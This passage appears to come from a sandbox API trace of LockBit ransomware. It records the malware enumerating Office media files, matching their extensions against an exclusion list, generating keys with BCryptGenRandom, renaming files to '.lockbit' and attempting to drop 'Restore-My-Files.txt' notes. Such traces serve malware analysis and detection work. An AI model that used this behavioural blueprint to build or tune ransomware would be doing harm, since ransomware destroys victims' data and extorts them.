cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0201.951] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0201.961] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18244_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18244_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.961] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.961] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0201.961] free (_Block=0x1fa2ed8) [0201.961] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18244_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.961] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.961] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.962] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3027e300, ftCreationTime.dwHighDateTime=0x1bdcf22, ftLastAccessTime.dwLowDateTime=0xbccbe2a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3027e300, ftLastWriteTime.dwHighDateTime=0x1bdcf22, nFileSizeHigh=0x0, nFileSizeLow=0xea2, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18245_.WMF", cAlternateFileName="")) returned 1 [0201.962] lstrcmpiW (lpString1=".", lpString2="BD18245_.WMF") returned -1 [0201.962] lstrcmpiW (lpString1="..", lpString2="BD18245_.WMF") returned -1 [0201.962] PathFindExtensionW (pszPath="BD18245_.WMF") returned=".WMF" [0201.962] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.962] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.963] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.963] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18245_.WMF") returned 1 [0201.964] lstrcmpiW (lpString1="ntldr", lpString2="BD18245_.WMF") returned 1 [0201.964] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18245_.WMF") returned 1 [0201.964] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18245_.WMF") returned 1 [0201.964] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18245_.WMF") returned -1 [0201.964] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18245_.WMF") returned 1 [0201.964] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18245_.WMF") returned 1 [0201.964] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.964] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18245_.WMF") returned=".WMF" [0201.964] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.964] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.964] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.965] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.965] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.965] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.965] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.965] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.965] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.965] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.965] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.965] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18245_.WMF.lockbit") returned 79 [0201.965] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18245_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18245_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0201.966] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.966] malloc (_Size=0x40068) returned 0x3df0008 [0201.967] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3746) returned 1 [0201.967] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.967] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0201.967] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.968] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0201.968] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.022] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18245_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18245_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.022] malloc (_Size=0xb4) returned 0x1fa2ed8 [0202.022] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0202.022] free (_Block=0x1fa2ed8) [0202.022] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18245_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0202.022] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0202.022] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.023] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc4feb00, ftCreationTime.dwHighDateTime=0x1bdcf1e, ftLastAccessTime.dwLowDateTime=0xbccbe2a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xcc4feb00, ftLastWriteTime.dwHighDateTime=0x1bdcf1e, nFileSizeHigh=0x0, nFileSizeLow=0xa28, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18246_.WMF", cAlternateFileName="")) returned 1 [0202.023] lstrcmpiW (lpString1=".", lpString2="BD18246_.WMF") returned -1 [0202.023] lstrcmpiW (lpString1="..", lpString2="BD18246_.WMF") returned -1 [0202.023] PathFindExtensionW (pszPath="BD18246_.WMF") returned=".WMF" [0202.023] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0202.023] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0202.024] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0202.024] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18246_.WMF") returned 1 [0202.024] lstrcmpiW (lpString1="ntldr", lpString2="BD18246_.WMF") returned 1 [0202.024] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18246_.WMF") returned 1 [0202.024] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18246_.WMF") returned 1 [0202.025] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18246_.WMF") returned -1 [0202.025] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18246_.WMF") returned 1 [0202.025] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18246_.WMF") returned 1 [0202.025] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0202.025] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18246_.WMF") returned=".WMF" [0202.025] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.025] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0202.025] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0202.025] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18246_.WMF.lockbit") returned 79 [0202.025] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18246_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18246_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.027] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.028] malloc (_Size=0x40068) returned 0x3df0008 [0202.028] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2600) returned 1 [0202.028] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.028] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.028] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.028] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.028] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.035] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18246_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18246_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.035] malloc (_Size=0xb4) returned 0x1fa2ed8 [0202.035] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0202.035] free (_Block=0x1fa2ed8) [0202.035] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18246_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0202.035] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0202.035] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.036] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba237c00, ftCreationTime.dwHighDateTime=0x1bdcf21, ftLastAccessTime.dwLowDateTime=0xbccbe2a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xba237c00, ftLastWriteTime.dwHighDateTime=0x1bdcf21, nFileSizeHigh=0x0, nFileSizeLow=0xd68, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18247_.WMF", cAlternateFileName="")) returned 1 [0202.036] lstrcmpiW (lpString1=".", lpString2="BD18247_.WMF") returned -1 [0202.036] lstrcmpiW (lpString1="..", lpString2="BD18247_.WMF") returned -1 [0202.036] PathFindExtensionW (pszPath="BD18247_.WMF") returned=".WMF" [0202.036] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0202.036] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0202.037] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 